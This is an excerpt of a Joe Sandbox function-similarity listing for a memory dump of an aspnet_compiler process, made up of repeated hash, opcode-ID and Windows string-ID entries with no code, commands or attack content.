                                                                                                        • Opcode ID: b89ff562ac04c3aa6a4be4397d44fa60af8352c1240318fd32c5bd70d96ace58
                                                                                                        • Instruction ID: c65fcd17dd13081d1106a391cbdc91035ad1d7e2310bcc9d277005956cdca8fa
                                                                                                        • Opcode Fuzzy Hash: b89ff562ac04c3aa6a4be4397d44fa60af8352c1240318fd32c5bd70d96ace58
                                                                                                        • Instruction Fuzzy Hash: CCF0C275641308BFEB28E64DDC47F99376CFB40B58F54006DFB506B682E3B0A950CA91
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: #%u
                                                                                                        • API String ID: 48624451-232158463
                                                                                                        • Opcode ID: 7d863da81fe4b835624ebfb99554e78133f96fb0c4996998b0cccd52d27fb537
                                                                                                        • Instruction ID: d2fdedf95773b9cec522411cc15f513e315a879bb63bbc09c301f068ea4b5c8f
                                                                                                        • Opcode Fuzzy Hash: 7d863da81fe4b835624ebfb99554e78133f96fb0c4996998b0cccd52d27fb537
                                                                                                        • Instruction Fuzzy Hash: A0717A71A0015A9FDB09DFA8C984BAEB7F8FF18348F154165E904E7251EB38EE51CB60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@
                                                                                                        • API String ID: 0-149943524
                                                                                                        • Opcode ID: 6f9a603f7896236f6a4e93dbf1f4d08cd2479fd30bc3dc3963763df61bed606b
                                                                                                        • Instruction ID: a4db4721a95d511cd7782a8c6360d51694bdac2728eb7a9ccaeb05bcb7d8378e
                                                                                                        • Opcode Fuzzy Hash: 6f9a603f7896236f6a4e93dbf1f4d08cd2479fd30bc3dc3963763df61bed606b
                                                                                                        • Instruction Fuzzy Hash: F1328A705087628BEB6CCF19C4807BEBBF2EF88754F14491EEA9597290E774D860CB52
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `$`
                                                                                                        • API String ID: 0-197956300
                                                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                        • Instruction ID: e853552934fa1a130efdc98cd839adb7fcff2a0e6ab645251dbdcf6271c50d7e
                                                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                        • Instruction Fuzzy Hash: 32C1C2312043469BEB29CF28D841B6BBBE5BFC4318F184A2DF696CB290D775E505CB42
                                                                                                        Strings
                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0111A309
                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0111A2FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                        • API String ID: 0-2876891731
                                                                                                        • Opcode ID: f691ae1542e8ca8e2cef881b772856cbd8099b6cc5cf006cce4635059c6a4b9d
                                                                                                        • Instruction ID: f663023e1266ecc09e74490bb2fb214741a5c771de025973a3c768fe878eed53
                                                                                                        • Opcode Fuzzy Hash: f691ae1542e8ca8e2cef881b772856cbd8099b6cc5cf006cce4635059c6a4b9d
                                                                                                        • Instruction Fuzzy Hash: C641FF30A19299DBDB2ECF69D840B6EBBB4FF84704F2440A5E910DB395E3B5DA01CB51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                        • API String ID: 0-118005554
                                                                                                        • Opcode ID: 82bdb33d77351cb2e7581e31a64a5ae16b221d688569880cb5ae9e40746757d7
                                                                                                        • Instruction ID: 599b841a16951fd464883bb4508ccf65d8761f5cd492d866719586bd560d09ce
                                                                                                        • Opcode Fuzzy Hash: 82bdb33d77351cb2e7581e31a64a5ae16b221d688569880cb5ae9e40746757d7
                                                                                                        • Instruction Fuzzy Hash: 2C3107352287429FD319DF68D848B1ABBE4FF84714F440859F968CB391E734DA05CB92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .Local\$@
                                                                                                        • API String ID: 0-380025441
                                                                                                        • Opcode ID: 9c2d57cdc117456d3671d470ba13690e703a0a338dcc74043a866768b0e84446
                                                                                                        • Instruction ID: a2259f3c1bfdb4c86579df1ad25b549cb1489b91bd423ce6b3c20c1bba7cff30
                                                                                                        • Opcode Fuzzy Hash: 9c2d57cdc117456d3671d470ba13690e703a0a338dcc74043a866768b0e84446
                                                                                                        • Instruction Fuzzy Hash: BE318F7251C315DFC329DF28C480A6BBBE8FB88A54F41092EF9A583250DB34DD04CB92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                        • Opcode ID: a9a6f18889193d05ec3604051b9470ab4a1972d486ca929f85ab064d0bcf555b
                                                                                                        • Instruction ID: 1e9e3bc0231fd517323a12a89c732bb1e89cf71f8b66308e7c8de190d7b06e1e
                                                                                                        • Opcode Fuzzy Hash: a9a6f18889193d05ec3604051b9470ab4a1972d486ca929f85ab064d0bcf555b
                                                                                                        • Instruction Fuzzy Hash: A101F4B2280700EFD311DF14ED49F1677E8EB84B19F028939A659CB590E774D804CB4A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 55041a0999dcf6be26af14ab4c44137889e8f32304cc571b2bde6e06fde3b4b2
                                                                                                        • Instruction ID: 5433271f8cda9fcde05f7284d2c36788f4335c6373b135fc5306b07f80d8a203
                                                                                                        • Opcode Fuzzy Hash: 55041a0999dcf6be26af14ab4c44137889e8f32304cc571b2bde6e06fde3b4b2
                                                                                                        • Instruction Fuzzy Hash: 8AA17971608342CFD329DF28D480A2AFBF6BF98304F114A6EE58597395E730E945CB92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: aa587cd2ac4f8fffe7a41e04b869ae422b6b0fd94404e6d5eb933263b86c6652
                                                                                                        • Instruction ID: 2e2ee6d64bb331ac80ac84db50fc19b3adb7ec4fb45fa7a4568d359029b15f83
                                                                                                        • Opcode Fuzzy Hash: aa587cd2ac4f8fffe7a41e04b869ae422b6b0fd94404e6d5eb933263b86c6652
                                                                                                        • Instruction Fuzzy Hash: 07916072900219AFEB29DF95CC85FEEBBB8EF58754F100025F610AB194D774AD04CBA0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: PreferredUILanguages
                                                                                                        • API String ID: 0-1884656846
                                                                                                        • Opcode ID: 8d51c1403435cff4d7da338b8e09b8efb2098d601d601b2b2e25259090dd73ec
                                                                                                        • Instruction ID: bd20b2d30d1082cb411fc9d8c6b9f5a07790154e323aab05f42b2d07dc4b2ca7
                                                                                                        • Opcode Fuzzy Hash: 8d51c1403435cff4d7da338b8e09b8efb2098d601d601b2b2e25259090dd73ec
                                                                                                        • Instruction Fuzzy Hash: 0941E732D08259ABDF19DAD9CC41BEEBBB9AF54B90F05012AED11EB250D774DE00C7A4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: kLsE
                                                                                                        • API String ID: 0-3058123920
                                                                                                        • Opcode ID: 6691115f4ddb6d91ae46967161d306fdf02289feb16f5351100d0905eed41502
                                                                                                        • Instruction ID: 1aa704fb1f8694da01a0c151fab06233df91ce7f1233b83ccf8fe64f7d33cdf9
                                                                                                        • Opcode Fuzzy Hash: 6691115f4ddb6d91ae46967161d306fdf02289feb16f5351100d0905eed41502
                                                                                                        • Instruction Fuzzy Hash: 314128715013964AE73BAB78F8CCBA57F94AB91B28F144729EE504B0CACB744485C7A1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #
                                                                                                        • API String ID: 0-1885708031
                                                                                                        • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                        • Instruction ID: 2e92a7fae38c32ea4b8af74c87b897f3efb35a222037d8437353cf77f95a2862
                                                                                                        • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                        • Instruction Fuzzy Hash: E941CE75A00666EBDF29DF48C490BBEB7B5EF84B05F11405AE905AF280DB34D941CBE2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Actx
                                                                                                        • API String ID: 0-89312691
                                                                                                        • Opcode ID: 78f656a8316b44746ff678ae6b4fd08416cfed2c0a66de534ff6a9dac10dc367
                                                                                                        • Instruction ID: 2f10af6e2afae28ca1ac802826438eb60049e0cbf7b0ce9d3f2695b60a439bbd
                                                                                                        • Opcode Fuzzy Hash: 78f656a8316b44746ff678ae6b4fd08416cfed2c0a66de534ff6a9dac10dc367
                                                                                                        • Instruction Fuzzy Hash: AA1193303086128BEBAD495DC85067AF797EBC7264F36853AE5A2CB399D771DC41C382
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrCreateEnclave
                                                                                                        • API String ID: 0-3262589265
                                                                                                        • Opcode ID: 8a30dab233ac0d51699a40762b95d7851fb4885274fedf7a7559be18357980d4
                                                                                                        • Instruction ID: 58f6d323fa2f77ef63ae2bbc1db8cbc568d0fe439bbcde78ce3e6946aea5d514
                                                                                                        • Opcode Fuzzy Hash: 8a30dab233ac0d51699a40762b95d7851fb4885274fedf7a7559be18357980d4
                                                                                                        • Instruction Fuzzy Hash: ED2137B1518345AFC724DF2AD845A5BFBE8FBD5B10F000A1FB9A087250D7B09545CB92
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a5a3f4343a4e13e2992b8c0e2eae240d267a6ffd9687f11dd4080b9df584892e
                                                                                                        • Instruction ID: 1061db224d1f12e964b0c07b4aed7cf6846086632e3dbc43a1cfe09fcb3bbe98
                                                                                                        • Opcode Fuzzy Hash: a5a3f4343a4e13e2992b8c0e2eae240d267a6ffd9687f11dd4080b9df584892e
                                                                                                        • Instruction Fuzzy Hash: 9242AF71A006168FDB1DCF5DC4906BEBBBAFF88318B148159D952AB381D736EC52CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d33b100b8a3b9e8f9d3936b9414e4a63adb4665c1cf02b8e6e145053e5c33b99
                                                                                                        • Instruction ID: 89eccd3f21fde24eccba7d6d0a658f3560581adba50feaab0bd38e2d4b522d69
                                                                                                        • Opcode Fuzzy Hash: d33b100b8a3b9e8f9d3936b9414e4a63adb4665c1cf02b8e6e145053e5c33b99
                                                                                                        • Instruction Fuzzy Hash: B032E4B1E05219DFDF28CF98C890BAEBBB1FF94714F180029E805AB385E7359911CB95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0bf88a55293b9bc0fa77efed3f257e1ab6c817ba709ac3d06d72c81b4c936d16
                                                                                                        • Instruction ID: 8cb6349706c28c424b1f1971b3acd8ce995cc98e8683b151af09e6fdee232baa
                                                                                                        • Opcode Fuzzy Hash: 0bf88a55293b9bc0fa77efed3f257e1ab6c817ba709ac3d06d72c81b4c936d16
                                                                                                        • Instruction Fuzzy Hash: FF427F75E002198FEB29CF69C841BADBBF5BF88305F548199E948EB241D7349D81CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 793b1b39a0526c68fe0b4ac23570d2a5e14d7e8261b9683d6fcee4295d94da4e
                                                                                                        • Instruction ID: b316c3608eaa36a067dc54969e615f3bd61174db135a206e8a2796cd3d1b966f
                                                                                                        • Opcode Fuzzy Hash: 793b1b39a0526c68fe0b4ac23570d2a5e14d7e8261b9683d6fcee4295d94da4e
                                                                                                        • Instruction Fuzzy Hash: 2522D2702046618BEB2DCF2DE0D43F2BBF1AF45300F09849AD9968F286D735E552CB61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 250d2a431d2c18935724ee584a51e8857f8ec2eab765d4eea0f54854c12655a2
                                                                                                        • Instruction ID: 66482853b34f46eb5ba92962e3345aee77e3c1f462fe0c5b3dcedc7f866e8d8e
                                                                                                        • Opcode Fuzzy Hash: 250d2a431d2c18935724ee584a51e8857f8ec2eab765d4eea0f54854c12655a2
                                                                                                        • Instruction Fuzzy Hash: C7E18D71608342CFC719CF28C490A6AFBE1FF89314F05896DE9958B355EB72E905CB92
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 61565ae6107d93fedfbbc82d3b9047867d0ecb9ee29a356e4d085f4f03c71cb5
                                                                                                        • Instruction ID: 85197ca5333e34092b43743b7f4e1d5db58b96722f458a3afc5f23c8cbf57f54
                                                                                                        • Opcode Fuzzy Hash: 61565ae6107d93fedfbbc82d3b9047867d0ecb9ee29a356e4d085f4f03c71cb5
                                                                                                        • Instruction Fuzzy Hash: 1CD1F471F08606DBDB1EDF69C880ABAB7A5BF54308F05422DE916DB2C0EB71E951CB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                        • Instruction ID: 6fef0b31054c6651617a794a0e960c05e5f30cc34878dfc3f72ac2c3f4a887cf
                                                                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                        • Instruction Fuzzy Hash: 60B14374A006099FDF28DF99C940AABBBB5FF86304F14446DAA62D7791DB34E905CB10
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                        • Instruction ID: 59adec711cd3aeaaf50e9809bb461e011e6b6fb702efb526e94b87382ecb57fe
                                                                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                        • Instruction Fuzzy Hash: 65B13831600656AFDB2EDB68C850BBEBBF6AF88304F150659E652D7381DB30ED41CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 78aa923f07cd05261f372e37d746176e493ec09efa570735e224c0aa8a09bdcd
                                                                                                        • Instruction ID: 7e6864922793aeb3629146159c3b5611c172a556d0e5c0773dc81371935bc4ff
                                                                                                        • Opcode Fuzzy Hash: 78aa923f07cd05261f372e37d746176e493ec09efa570735e224c0aa8a09bdcd
                                                                                                        • Instruction Fuzzy Hash: 2AA1917150061AEFEF1ADFA8CC85FAE7BB9AF49754F010154FA00AB290D7B59C10CBA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 89eeb2e32ecb7de6b41cb6b2bb9e800eb219e961f41156bd26e6b8b86078851a
                                                                                                        • Instruction ID: e7e1b32953d2eac176f7e3f746505832d7e059f1b62842663fd850bb6aaea82d
                                                                                                        • Opcode Fuzzy Hash: 89eeb2e32ecb7de6b41cb6b2bb9e800eb219e961f41156bd26e6b8b86078851a
                                                                                                        • Instruction Fuzzy Hash: D0C136751083419FE768CF19C484BAABBF5FF88304F44896DE98987295DB74E908CB92
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f9362ac52fd81428c14ff395c961900142113b8a100d855b50466c32092459ed
                                                                                                        • Instruction ID: 08ab9651331f9be970e1e5f6fc3682d68e51d28b2b4ffa37a50d56f3ea8112fc
                                                                                                        • Opcode Fuzzy Hash: f9362ac52fd81428c14ff395c961900142113b8a100d855b50466c32092459ed
                                                                                                        • Instruction Fuzzy Hash: E9B19174B002668BDB79DF58C880BA9B3B5EF44704F0486E9D50AE7281EB71DD86CF61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2fd0395ec86c58f3d5bfb592a5ae2ed9672d9bb66a39895ddb13ab4c046b2967
                                                                                                        • Instruction ID: fcd3bb9a0b4d024e8e9aff417f7bb32cf1ddd6a3f36f71a6fa15ae56d7eb759f
                                                                                                        • Opcode Fuzzy Hash: 2fd0395ec86c58f3d5bfb592a5ae2ed9672d9bb66a39895ddb13ab4c046b2967
                                                                                                        • Instruction Fuzzy Hash: 74A12771E0171A9FEB2EDB98C848FAEBBB4AF44714F050121EA20AB395D7749D41CBD1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 02c7f398f9550f91543a2a02a39e186f9b0720cc57c5b9f2c1677d1d67f9b907
                                                                                                        • Instruction ID: 7ac58f6c16720db7fc67bf340e1ef15e921d4abbcfeb51a4cf24490c9594b4b9
                                                                                                        • Opcode Fuzzy Hash: 02c7f398f9550f91543a2a02a39e186f9b0720cc57c5b9f2c1677d1d67f9b907
                                                                                                        • Instruction Fuzzy Hash: 32A1B570B0061ADFDB6DDFA9C591BBABBB1FF48318F144129EE5597282DB34A801CB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d3a2698543a1cb24a02fee8d36991654b1c4ddf0a3a887c13091a41e86cf14d5
                                                                                                        • Instruction ID: 67d3d5239bcbc406c3fcdba5f77949d9acc1cdd612e637fc5a081f0b5a65035c
                                                                                                        • Opcode Fuzzy Hash: d3a2698543a1cb24a02fee8d36991654b1c4ddf0a3a887c13091a41e86cf14d5
                                                                                                        • Instruction Fuzzy Hash: 24A1FE72A00A12DFD72ADF98C984F6AB7E9FF48708F410628E585DBA51D334EC10CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1b49f437fb2f42f799585873e90da595d9d77834a945bf1fbc955cac4912fec3
                                                                                                        • Instruction ID: 6d553eb978ba3e30e6a6770af66122530b405f1cb74edb4448dbfec93925f75c
                                                                                                        • Opcode Fuzzy Hash: 1b49f437fb2f42f799585873e90da595d9d77834a945bf1fbc955cac4912fec3
                                                                                                        • Instruction Fuzzy Hash: E4917171D04216AFDF19CFA8D894BAEBBB5AF48710F154169E624EB341D734EA00DBB0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 329c281381ff9e36529b8a9e20b8e24e36647d6b3c56785b229e08f015e2d217
                                                                                                        • Instruction ID: 1f4d9f305a613729267360887fcf00b9959bb4aeda33badfa30205b2e3c7d1d2
                                                                                                        • Opcode Fuzzy Hash: 329c281381ff9e36529b8a9e20b8e24e36647d6b3c56785b229e08f015e2d217
                                                                                                        • Instruction Fuzzy Hash: 35914535A0166ACBEB2CDB58C840BBD7BB1EF94728F058169E905DB381FB34D821CB51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 00c26e1001e754c51b7550544956619b5ef72cd55c2d49ea18b162cc881062d2
                                                                                                        • Instruction ID: ef3c5883e2d05c7abfc53def919ee0167f6fb1bbf62a0283039cdcdd9f0c82d3
                                                                                                        • Opcode Fuzzy Hash: 00c26e1001e754c51b7550544956619b5ef72cd55c2d49ea18b162cc881062d2
